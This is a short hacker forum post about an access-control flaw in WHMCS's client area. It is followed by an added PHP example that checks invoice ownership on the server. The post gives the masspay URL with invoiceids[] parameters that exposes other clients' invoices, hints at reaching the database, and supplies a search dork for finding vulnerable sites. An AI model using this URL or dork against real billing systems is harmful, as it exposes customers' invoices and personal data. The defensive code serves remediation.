I decided to give WHMCS a chance to patch this.

The first part of this vulnerability: Log in as a client. Start your quest at /clientarea.php?action=masspay&invoiceids[]=1&invoiceids[]=2

This will allow you to access any invoice, even if you don't own it. If you've got what it takes, you'll find out how to exploit this further and get some real database access.

It turns out the hint is actually here ->

PHP Code:

Have fun!

Dork : powered by whmcompletesolution inurl:clientarea.php?action=masspay

Congratulations.

Regards, AeonHack
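
The server-side check whose absence the post describes, as an added example that is not part of the original post and is not WHMCS code: every id in invoiceids[] is validated and matched against the logged-in client before any invoice is loaded. The invoices table, its client_id column and the function name ownedInvoiceIds are hypothetical, and the sample rows are constructed.

```php
<?php
// Added example, not WHMCS code. Table, column and function names are hypothetical.

// Return the requested invoice ids only if every one belongs to $clientId.
// A malformed or foreign id makes the whole request fail closed.
function ownedInvoiceIds(PDO $db, int $clientId, $requested): array
{
    if (!is_array($requested) || $requested === []) {
        throw new InvalidArgumentException('invoiceids must be a non-empty array');
    }
    $ids = [];
    foreach ($requested as $raw) {
        // Plain decimal digits only: rejects nested arrays, signs and any other text.
        if (!is_string($raw) || !ctype_digit($raw)) {
            throw new InvalidArgumentException('invalid invoice id');
        }
        $ids[(int) $raw] = true; // array keys de-duplicate repeated ids
    }
    $ids = array_keys($ids);

    // Ownership is enforced in the query, bound to the session's client id.
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT id FROM invoices WHERE client_id = ? AND id IN ($marks)");
    $stmt->bindValue(1, $clientId, PDO::PARAM_INT);
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 2, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    $owned = array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));

    if (count($owned) !== count($ids)) {
        throw new RuntimeException('request names an invoice this client does not own');
    }
    sort($owned);
    return $owned;
}

// Constructed sample data: client 1 owns invoices 1 and 3, client 2 owns invoice 2.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE invoices (id INTEGER PRIMARY KEY, client_id INTEGER)');
$db->exec('INSERT INTO invoices VALUES (1, 1), (2, 2), (3, 1)');

$sessionClientId = 1; // taken from the authenticated session, never from the request
foreach ([['1', '3'], ['1', '2']] as $invoiceids) {
    try {
        echo implode(',', ownedInvoiceIds($db, $sessionClientId, $invoiceids)), " allowed\n";
    } catch (Exception $e) {
        echo 'denied: ', $e->getMessage(), "\n";
    }
}
```

Logging each denied request together with the session's client id gives operators a record of invoice-id enumeration attempts against the masspay action.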